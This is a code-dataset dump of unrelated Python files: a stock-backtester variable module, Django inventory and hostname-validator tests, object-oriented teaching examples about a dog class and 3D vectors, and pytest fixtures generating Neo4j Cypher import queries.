03e8bf048f8a5602d8172dff0c1d12f2ed9af7ff
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2017 by Michael Dombrowski <http://MikeDombrowski.com/>.
#
# This file is part of Python Customizable Stock Backtester <http://github.com/md100play/Stock_Backtester/>.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, distribute with
# modifications, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# ABOVE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Except as contained in this notice, the name(s) of the above copyright
# holders shall not be used in advertising or otherwise to promote the sale,
# use or other dealings in this Software without prior written authorization.
from booleano.operations import Variable, ArrayVariable
class StockPrice(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return float(context['stock']['price'])
else:
return float(context['stock']["data"].get(self.index)['price'])
class StockOpenPrice(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return float(context['stock']['open_price'])
else:
return float(context['stock']["data"].get(self.index)['open_price'])
class StockClosePrice(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return float(context['stock']['close_price'])
else:
return float(context['stock']["data"].get(self.index)['close_price'])
class StockBuyPrice(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
return float(context['stock']['buy_price'])
class StockOwned(Variable):
operations = {"boolean"}
def equals(self, value, context):
actual = self.to_python(context)
expected = bool(value)
return actual == expected
def __call__(self, context):
return self.to_python(context)
def to_python(self, context):
return bool(context['stock']['owned'])
class StockIncreaseRank(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return int(context['stock']['increase_rank'])
else:
return int(context['stock']["data"].get(self.index)['increase_rank'])
class StockDecreaseRank(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return int(context['stock']['decrease_rank'])
else:
return int(context['stock']["data"].get(self.index)['decrease_rank'])
class StockPercChange(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = float(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return float(context['stock']['change_percent'])
else:
return float(context['stock']["data"].get(self.index)['change_percent'])
class StockSymbol(Variable):
operations = {"equality", "membership"}
def equals(self, value, context):
actual_symbol = self.to_python(context).lower()
expected_symbol = value.lower()
return actual_symbol == expected_symbol
def belongs_to(self, value, context):
return self.to_python(context) in value
def is_subset(self, value, context):
return value.issubset(self.to_python(context))
def to_python(self, context):
return str(context['stock']["symbol"])
class DateBuy(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual < expected
def __other_to_python(self, value):
return value
def to_python(self, context):
return context["date"]["buy"]
class DateToday(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = self.__other_to_python(value)
return actual < expected
def __other_to_python(self, value):
return value
def to_python(self, context):
if self.index == 0:
return context["date"]["today"]
else:
return context["date"]["data"].get(self.index)['today']
class DateDayOfWeek(ArrayVariable):
operations = {"equality", "inequality", "membership"}
def equals(self, value, context):
actual_symbol = self.to_python(context)
expected_symbol = value.lower()
return actual_symbol == expected_symbol
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def belongs_to(self, value, context):
return self.to_python(context) in value
def is_subset(self, value, context):
return value.issubset(self.to_python(context))
def to_python(self, context):
if self.index == 0:
return int(context['date']["day_of_week"])
else:
return int(context["date"]["data"].get(self.index)['day_of_week'])
class DateMonth(ArrayVariable):
operations = {"equality", "inequality", "membership"}
def equals(self, value, context):
actual_symbol = self.to_python(context)
expected_symbol = value.lower()
return actual_symbol == expected_symbol
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def belongs_to(self, value, context):
return self.to_python(context) in value
def is_subset(self, value, context):
return value.issubset(self.to_python(context))
def to_python(self, context):
if self.index == 0:
return int(context['date']["month"])
else:
return int(context["date"]["data"].get(self.index)['month'])
class DateDays(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
return int(context["date"]["days"])
class DateMonths(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
return int(context["date"]["months"])
class DateYears(Variable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
return int(context["date"]["years"])
class DateDaysOfHistory(ArrayVariable):
operations = {"equality", "inequality"}
def equals(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual == expected
def greater_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual > expected
def less_than(self, value, context):
actual = self.to_python(context)
expected = int(value)
return actual < expected
def to_python(self, context):
if self.index == 0:
return int(context['date']['days_of_history'])
else:
return int(context["date"]["data"].get(self.index)['days_of_history'])
| 27.22779
| 108
| 0.725425
| 1,577
| 11,953
| 5.387445
| 0.121116
| 0.074388
| 0.076271
| 0.120763
| 0.787194
| 0.778249
| 0.772834
| 0.772834
| 0.772834
| 0.753649
| 0
| 0.00168
| 0.153267
| 11,953
| 438
| 109
| 27.289954
| 0.837763
| 0.120974
| 0
| 0.832787
| 0
| 0
| 0.068696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.239344
| false
| 0
| 0.003279
| 0.052459
| 0.62623
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ab4341cb4e492d2f28055d808ca03dc4fdb0118
| 18
|
py
|
Python
|
Python/Tests/TestData/Grammar/UnaryOperators.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Grammar/UnaryOperators.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Grammar/UnaryOperators.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
-1
~1
+1
not 1
| 4.5
| 5
| 0.388889
| 6
| 18
| 1.333333
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.363636
| 0.388889
| 18
| 4
| 5
| 4.5
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
46cee5ab35c5589e8878eed739d687b50e890efb
| 11,043
|
py
|
Python
|
src/resource_inventory/tests/test_managers.py
|
opnfv/laas
|
35b9f39178cc502a5283a1b37a65f7dd0838ae05
|
[
"Apache-2.0"
] | 2
|
2020-10-31T15:03:20.000Z
|
2021-03-22T16:29:15.000Z
|
src/resource_inventory/tests/test_managers.py
|
opnfv/laas
|
35b9f39178cc502a5283a1b37a65f7dd0838ae05
|
[
"Apache-2.0"
] | 13
|
2019-12-04T23:29:42.000Z
|
2022-03-02T04:53:53.000Z
|
src/resource_inventory/tests/test_managers.py
|
opnfv/laas
|
35b9f39178cc502a5283a1b37a65f7dd0838ae05
|
[
"Apache-2.0"
] | null | null | null |
##############################################################################
# Copyright (c) 2018 Parker Berberian, Sawyer Bergeron, and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
from django.test import TestCase
from django.contrib.auth.models import User
from resource.inventory_manager import InventoryManager
from resource.resource_manager import ResourceManager, HostNameValidator
from account.models import Lab
from resource.models import (
Host,
Vlan,
Interface,
ResourceBundle,
GenericHost,
GenericResourceBundle,
CpuProfile,
RamProfile,
DiskProfile,
HostProfile,
InterfaceProfile
)
class InventoryManagerTestCase(TestCase):
def test_singleton(self):
instance = InventoryManager.getInstance()
self.assertTrue(isinstance(instance, InventoryManager))
self.assertTrue(instance is InventoryManager.getInstance())
def setUp(self):
# setup
# create lab and give it resources
user = User.objects.create(username="username")
self.lab = Lab.objects.create(
lab_user=user,
name='test lab',
contact_email='someone@email.com',
contact_phone='dont call me'
)
# create hostProfile
hostProfile = HostProfile.objects.create(
host_type=0,
name='Test profile',
description='a test profile'
)
InterfaceProfile.objects.create(
speed=1000,
name='eno3',
host=hostProfile
)
DiskProfile.objects.create(
size=1000,
media_type="SSD",
name='/dev/sda',
host=hostProfile
)
CpuProfile.objects.create(
cores=96,
architecture="x86_64",
cpus=2,
host=hostProfile
)
RamProfile.objects.create(
amount=256,
channels=4,
host=hostProfile
)
# create GenericResourceBundle
genericBundle = GenericResourceBundle.objects.create()
self.gHost1 = GenericHost.objects.create(
bundle=genericBundle,
name='generic host 1',
profile=hostProfile
)
self.gHost2 = GenericHost.objects.create(
bundle=genericBundle,
name='generic host 2',
profile=hostProfile
)
# actual resource bundle
bundle = ResourceBundle.objects.create(template=genericBundle)
self.host1 = Host.objects.create(
template=self.gHost1,
booked=True,
name='host1',
bundle=bundle,
profile=hostProfile,
lab=self.lab
)
self.host2 = Host.objects.create(
template=self.gHost2,
booked=True,
name='host2',
bundle=bundle,
profile=hostProfile,
lab=self.lab
)
vlan1 = Vlan.objects.create(vlan_id=300, tagged=False)
vlan2 = Vlan.objects.create(vlan_id=300, tagged=False)
Interface.objects.create(
mac_address='00:11:22:33:44:55',
bus_address='some bus address',
switch_name='switch1',
port_name='port10',
config=vlan1,
host=self.host1
)
Interface.objects.create(
mac_address='00:11:22:33:44:56',
bus_address='some bus address',
switch_name='switch1',
port_name='port12',
config=vlan2,
host=self.host2
)
def test_acquire_host(self):
host = InventoryManager.getInstance().acquireHost(self.gHost1, self.lab.name)
self.assertNotEquals(host, None)
self.assertTrue(host.booked)
self.assertEqual(host.template, self.gHost1)
def test_release_host(self):
host = InventoryManager.getInstance().acquireHost(self.gHost1, self.lab.name)
self.assertTrue(host.booked)
InventoryManager.getInstance().releaseHost(host)
self.assertFalse(host.booked)
class ResourceManagerTestCase(TestCase):
def test_singleton(self):
instance = ResourceManager.getInstance()
self.assertTrue(isinstance(instance, ResourceManager))
self.assertTrue(instance is ResourceManager.getInstance())
def setUp(self):
# setup
# create lab and give it resources
user = User.objects.create(username="username")
self.lab = Lab.objects.create(
lab_user=user,
name='test lab',
contact_email='someone@email.com',
contact_phone='dont call me'
)
# create hostProfile
hostProfile = HostProfile.objects.create(
host_type=0,
name='Test profile',
description='a test profile'
)
InterfaceProfile.objects.create(
speed=1000,
name='eno3',
host=hostProfile
)
DiskProfile.objects.create(
size=1000,
media_type="SSD",
name='/dev/sda',
host=hostProfile
)
CpuProfile.objects.create(
cores=96,
architecture="x86_64",
cpus=2,
host=hostProfile
)
RamProfile.objects.create(
amount=256,
channels=4,
host=hostProfile
)
# create GenericResourceBundle
genericBundle = GenericResourceBundle.objects.create()
self.gHost1 = GenericHost.objects.create(
bundle=genericBundle,
name='generic host 1',
profile=hostProfile
)
self.gHost2 = GenericHost.objects.create(
bundle=genericBundle,
name='generic host 2',
profile=hostProfile
)
# actual resource bundle
bundle = ResourceBundle.objects.create(template=genericBundle)
self.host1 = Host.objects.create(
template=self.gHost1,
booked=True,
name='host1',
bundle=bundle,
profile=hostProfile,
lab=self.lab
)
self.host2 = Host.objects.create(
template=self.gHost2,
booked=True,
name='host2',
bundle=bundle,
profile=hostProfile,
lab=self.lab
)
vlan1 = Vlan.objects.create(vlan_id=300, tagged=False)
vlan2 = Vlan.objects.create(vlan_id=300, tagged=False)
Interface.objects.create(
mac_address='00:11:22:33:44:55',
bus_address='some bus address',
switch_name='switch1',
port_name='port10',
config=vlan1,
host=self.host1
)
Interface.objects.create(
mac_address='00:11:22:33:44:56',
bus_address='some bus address',
switch_name='switch1',
port_name='port12',
config=vlan2,
host=self.host2
)
def test_convert_bundle(self):
ResourceManager.getInstance().convertResoureBundle(self.genericBundle, self.lab.name)
# verify bundle configuration
class HostNameValidatorTestCase(TestCase):
def test_valid_hostnames(self):
self.assertTrue(HostNameValidator.is_valid_hostname("localhost"))
self.assertTrue(HostNameValidator.is_valid_hostname("Localhost"))
self.assertTrue(HostNameValidator.is_valid_hostname("localHost"))
self.assertTrue(HostNameValidator.is_valid_hostname("LOCALHOST"))
self.assertTrue(HostNameValidator.is_valid_hostname("f"))
self.assertTrue(HostNameValidator.is_valid_hostname("abc123doreyme"))
self.assertTrue(HostNameValidator.is_valid_hostname("F9999999"))
self.assertTrue(HostNameValidator.is_valid_hostname("my-host"))
self.assertTrue(HostNameValidator.is_valid_hostname("My-Host"))
self.assertTrue(HostNameValidator.is_valid_hostname("MY-HOST"))
self.assertTrue(HostNameValidator.is_valid_hostname("a-long-name-for-my-host"))
def test_invalid_hostnames(self):
self.assertFalse(HostNameValidator.is_valid_hostname("-long-name-for-my-host"))
self.assertFalse(HostNameValidator.is_valid_hostname("546"))
self.assertFalse(HostNameValidator.is_valid_hostname("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"))
def test_invalid_chars(self):
self.assertFalse(HostNameValidator.is_valid_hostname("contains!char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains@char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains#char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains$char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains%char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains^char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains&char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains*char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains(char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains)char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains_char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains=char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains+char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains|char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains\\char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains[char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains]char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains;char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains:char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains'char"))
self.assertFalse(HostNameValidator.is_valid_hostname('contains"char'))
self.assertFalse(HostNameValidator.is_valid_hostname("contains'char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains<char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains>char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains,char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains?char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains/char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains`char"))
self.assertFalse(HostNameValidator.is_valid_hostname("contains~char"))
| 36.566225
| 130
| 0.633886
| 1,058
| 11,043
| 6.488658
| 0.167297
| 0.119009
| 0.150328
| 0.200437
| 0.811071
| 0.793591
| 0.756009
| 0.747997
| 0.747997
| 0.747997
| 0
| 0.020679
| 0.255547
| 11,043
| 301
| 131
| 36.687708
| 0.814378
| 0.049624
| 0
| 0.586345
| 0
| 0
| 0.098246
| 0.010658
| 0
| 0
| 0
| 0
| 0.208835
| 1
| 0.040161
| false
| 0
| 0.024096
| 0
| 0.076305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64845da1e41ddb29434c1732975b034ecbd4a15d
| 7,994
|
py
|
Python
|
Module 2/B04710_CodeBundle/Chapter 3/B04170_03_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | 8
|
2016-10-16T13:01:30.000Z
|
2021-11-08T13:10:17.000Z
|
Module 2/B04710_CodeBundle/Chapter 3/B04170_03_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | null | null | null |
Module 2/B04710_CodeBundle/Chapter 3/B04170_03_Python_Draft_01.py
|
wagnerhsu/packt-Object-oriented-programming-for-JavaScript-developers
|
a305fabfa0195e7a6e57a4fe57ff9b4f1d55bdcc
|
[
"MIT"
] | 5
|
2016-08-24T09:43:42.000Z
|
2019-11-20T10:54:29.000Z
|
class TibetanSpaniel:
family = "Companion, herding"
area_of_origin = "Tibet"
learning_rate = 9
obedience = 3
problem_solving = 8
def __init__(self, name, favorite_toy, watchdog_ability):
self.name = name
self.watchdog_ability = watchdog_ability
self.favorite_toy = favorite_toy
print(TibetanSpaniel.family)
brian = TibetanSpaniel("Brian", "Talking Minion", 4)
print(brian.family)
TibetanSpaniel.obedience = 4
brian.obedience = 8
print(type(brian).obedience)
print(TibetanSpaniel.obedience)
print(brian.obedience)
class TibetanSpaniel:
family = "Companion, herding"
area_of_origin = "Tibet"
learning_rate = 9
obedience = 3
problem_solving = 8
def __init__(self, name, favorite_toy, watchdog_ability):
self._name = name
self._watchdog_ability = watchdog_ability
self._favorite_toy = favorite_toy
class TibetanSpaniel:
family = "Companion, herding"
area_of_origin = "Tibet"
learning_rate = 9
obedience = 3
problem_solving = 8
def __init__(self, name, favorite_toy, watchdog_ability):
self.__name = name
self.__watchdog_ability = watchdog_ability
self.__favorite_toy = favorite_toy
class TibetanSpaniel:
family = "Companion, herding"
area_of_origin = "Tibet"
learning_rate = 9
obedience = 3
problem_solving = 8
def __init__(self, name, favorite_toy, watchdog_ability):
self.__name = name
self.__watchdog_ability = watchdog_ability
self.__favorite_toy = favorite_toy
@property
def name(self):
return self.__name
merlin = TibetanSpaniel("Merlin", "Talking Smurf", 6)
merlin.name = "brian"
class TibetanSpaniel:
family = "Companion, herding"
area_of_origin = "Tibet"
learning_rate = 9
obedience = 3
problem_solving = 8
def __init__(self, name, favorite_toy, watchdog_ability):
self.__name = name
self.__watchdog_ability = watchdog_ability
self.__favorite_toy = favorite_toy
@property
def name(self):
return self.__name
@property
def favorite_toy(self):
return self.__favorite_toy
@favorite_toy.setter
def favorite_toy(self, favorite_toy):
self.__favorite_toy = favorite_toy
class TibetanSpaniel:
family = "Companion, herding"
area_of_origin = "Tibet"
learning_rate = 9
obedience = 3
problem_solving = 8
def __init__(self, name, favorite_toy, watchdog_ability):
self.__name = name
self.__watchdog_ability = watchdog_ability
self.__favorite_toy = favorite_toy
@property
def name(self):
return self.__name
@property
def favorite_toy(self):
return self.__favorite_toy
@favorite_toy.setter
def favorite_toy(self, favorite_toy):
self.__favorite_toy = favorite_toy
@property
def watchdog_ability(self):
return self.__watchdog_ability
@watchdog_ability.setter
def watchdog_ability(self, watchdog_ability):
if watchdog_ability < 0:
self.__watchdog_ability = 0
elif watchdog_ability > 10:
self.__watchdog_ability = 10
else:
self.__watchdog_ability = watchdog_ability
hugo = TibetanSpaniel("Hugo", "Tennis ball", 7)
hugo.watchdog_ability = -3
print(hugo.watchdog_ability)
hugo.watchdog_ability = 30
print(hugo.watchdog_ability)
hugo.watchdog_ability = 8
print(hugo.watchdog_ability)
class TibetanSpaniel:
family = "Companion, herding"
area_of_origin = "Tibet"
learning_rate = 9
obedience = 3
problem_solving = 8
def __init__(self, name, favorite_toy, watchdog_ability):
self.__name = name
self.__watchdog_ability = watchdog_ability
self.__favorite_toy = favorite_toy
@property
def name(self):
return self.__name
@property
def favorite_toy(self):
return self.__favorite_toy
@favorite_toy.setter
def favorite_toy(self, favorite_toy):
self.__favorite_toy = favorite_toy
@property
def watchdog_ability(self):
return self.__watchdog_ability
@watchdog_ability.setter
def watchdog_ability(self, watchdog_ability):
if watchdog_ability < 0:
self.__watchdog_ability = 0
elif watchdog_ability > 10:
self.__watchdog_ability = 10
else:
self.__watchdog_ability = watchdog_ability
@property
def protection_score(self):
return math.floor((self.__watchdog_ability + type(self).learning_rate + type(self).problem_solving) / 3)
cole = TibetanSpaniel("Cole", "Soccer ball", 4)
print(cole.protection_score)
class TibetanSpaniel:
family = "Companion, herding"
area_of_origin = "Tibet"
learning_rate = 9
obedience = 3
problem_solving = 8
def __init__(self, name, favorite_toy, watchdog_ability):
self.__name = name
self.__watchdog_ability = watchdog_ability
self.__favorite_toy = favorite_toy
@property
def name(self):
return self.__name
@property
def favorite_toy(self):
return self.__favorite_toy
@favorite_toy.setter
def favorite_toy(self, favorite_toy):
self.__favorite_toy = favorite_toy
@property
def watchdog_ability(self):
return self.__watchdog_ability
@watchdog_ability.setter
def watchdog_ability(self, watchdog_ability):
if watchdog_ability < 0:
self.__watchdog_ability = 0
elif watchdog_ability > 10:
self.__watchdog_ability = 10
else:
self.__watchdog_ability = watchdog_ability
@property
def protection_score(self):
return math.floor((self.__watchdog_ability + type(self).learning_rate + type(self).problem_solving) / 3)
class MutableVector3D:
def __init__(self, x, y, z):
self.__x = x
self.__y = y
self.__z = z
def sum(self, delta_x, delta_y, delta_z):
self.__x += delta_x
self.__y += delta_y
self.__z += delta_z
@property
def x(self):
return self.__x
@x.setter
def x(self, x):
self.__x = x
@property
def y(self):
return self.__y
@y.setter
def y(self, y):
self.__y = y
@property
def z(self):
return self.__z
@z.setter
def z(self, z):
self.__z = z
class MutableVector3D:
def __init__(self, x, y, z):
self.__x = x
self.__y = y
self.__z = z
def sum(self, delta_x, delta_y, delta_z):
self.__x += delta_x
self.__y += delta_y
self.__z += delta_z
@property
def x(self):
return self.__x
@x.setter
def x(self, x):
self.__x = x
@property
def y(self):
return self.__y
@y.setter
def y(self, y):
self.__y = y
@property
def z(self):
return self.__z
@z.setter
def z(self, z):
self.__z = z
@classmethod
def origin_vector(cls):
return cls(0, 0, 0)
mutableVector3D = MutableVector3D.origin_vector()
mutableVector3D.sum(5, 10, 15)
print(mutableVector3D.x, mutableVector3D.y, mutableVector3D.z)
class ImmutableVector3D:
def __init__(self, x, y, z):
self.__x = x
self.__y = y
self.__z = z
def sum(self, delta_x, delta_y, delta_z):
return type(self)(self.__x + delta_x, self.__y + delta_y, self.__z + delta_z)
@property
def x(self):
return self.__x
@property
def y(self):
return self.__y
@property
def z(self):
return self.__z
@classmethod
def equal_elements_vector(cls, initial_value):
return cls(initial_value, initial_value, initial_value)
@classmethod
def origin_vector(cls):
return cls.equal_elements_vector(0)
vector0 = ImmutableVector3D.origin_vector()
vector1 = vector0.sum(5, 10, 15)
print(vector1.x, vector1.y, vector1.z)
| 21.663957
| 112
| 0.650613
| 972
| 7,994
| 4.950617
| 0.073045
| 0.202618
| 0.098712
| 0.076475
| 0.852452
| 0.847049
| 0.847049
| 0.813383
| 0.802161
| 0.802161
| 0
| 0.014278
| 0.264073
| 7,994
| 368
| 113
| 21.722826
| 0.803672
| 0
| 0
| 0.870229
| 0
| 0
| 0.032149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.20229
| false
| 0
| 0
| 0.103053
| 0.5
| 0.041985
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
648b4acbbb22601f0875b7e7d65aad88744eb425
| 3,357
|
py
|
Python
|
tests/fixtures/fixture_writer.py
|
avisionh/sqlquerygraph
|
fabe5c77dba2eb692b456d4c7b9883ec2032406e
|
[
"MIT"
] | 3
|
2021-05-17T17:07:47.000Z
|
2022-01-01T14:28:38.000Z
|
tests/fixtures/fixture_writer.py
|
avisionh/sqlquerygraph
|
fabe5c77dba2eb692b456d4c7b9883ec2032406e
|
[
"MIT"
] | 10
|
2021-05-20T22:53:49.000Z
|
2021-06-13T21:58:04.000Z
|
tests/fixtures/fixture_writer.py
|
avisionh/sqlquerygraph
|
fabe5c77dba2eb692b456d4c7b9883ec2032406e
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.fixture()
def datasets():
return ["Reporting", "Analytics", "GitHub_Repos"]
@pytest.fixture()
def dir_file():
return "example/neo4j"
@pytest.fixture()
def query_constraint():
return (
"CREATE CONSTRAINT table_name_ConstraintReporting ON (r:Reporting)\n"
"ASSERT r.table_name IS UNIQUE;\n"
"CREATE CONSTRAINT table_name_ConstraintAnalytics ON (a:Analytics)\n"
"ASSERT a.table_name IS UNIQUE;\n"
"CREATE CONSTRAINT table_name_ConstraintGitHub_Repos ON (g:GitHub_Repos)\n"
"ASSERT g.table_name IS UNIQUE;\n"
)
@pytest.fixture()
def query_node_import():
return (
'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///reporting_tables.csv" AS csvLine\n'
"CREATE (:Reporting {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset), import_datetime: datetime()});\n"
'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///analytics_tables.csv" AS csvLine\n'
"CREATE (:Analytics {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset), import_datetime: datetime()});\n"
'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///github_repos_tables.csv" AS csvLine\n'
"CREATE (:GitHub_Repos {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset), import_datetime: datetime()});\n"
)
